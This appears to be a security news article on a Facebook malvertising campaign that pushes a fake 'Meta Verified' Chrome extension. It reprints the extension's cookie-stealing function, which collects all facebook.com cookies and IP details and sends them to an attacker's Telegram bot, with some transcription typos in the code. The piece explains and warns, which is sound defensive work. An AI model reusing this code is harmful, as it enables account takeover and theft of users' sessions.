Malicious actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake “Meta Verified” browser extension.
Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta’s subscription fee.
In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.
By leveraging trusted platforms like Box.com for hosting, attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.
Upon closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.
The extension’s code, although clumsily obfuscated and likely generated by an AI-assisted toolkit, still effectively exfiltrates data.
Bitdefender analysts identified the use of the Facebook Graph API to query Business account information once valid access tokens are acquired, allowing attackers to distinguish high-value corporate profiles from personal accounts.
.webp "Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details 2")
Victims who follow the tutorial unwittingly grant the extension permissions to read and export cookies from the facebook.com domain.
Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.
.webp "Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details 3")
To further personalize the stolen data, the malware queries https://ipinfo.io/json to append geolocation details, bolstering its marketability on underground forums.
Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for generating new campaign assets with minimal manual effort.
The modular design also supports automatic execution upon Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.
Infection Mechanism Deep Dive
The core of the infection mechanism lies in the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens without triggering user prompts.
After installation—triggered by clicking on an ad link—the extension uses chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies.
Within the callback, it constructs the payload:-
async function exportCookies() {
chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
const cookieString = cookies. Map(c => `${c.name}=${c.value}`).join(";");
const userId = cookies. Find(c => c.name === "c_user")?.value || "Unknown";
const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}nIP: ${ipInfo.ip || "Unknown"}nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.
Security teams should monitor abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
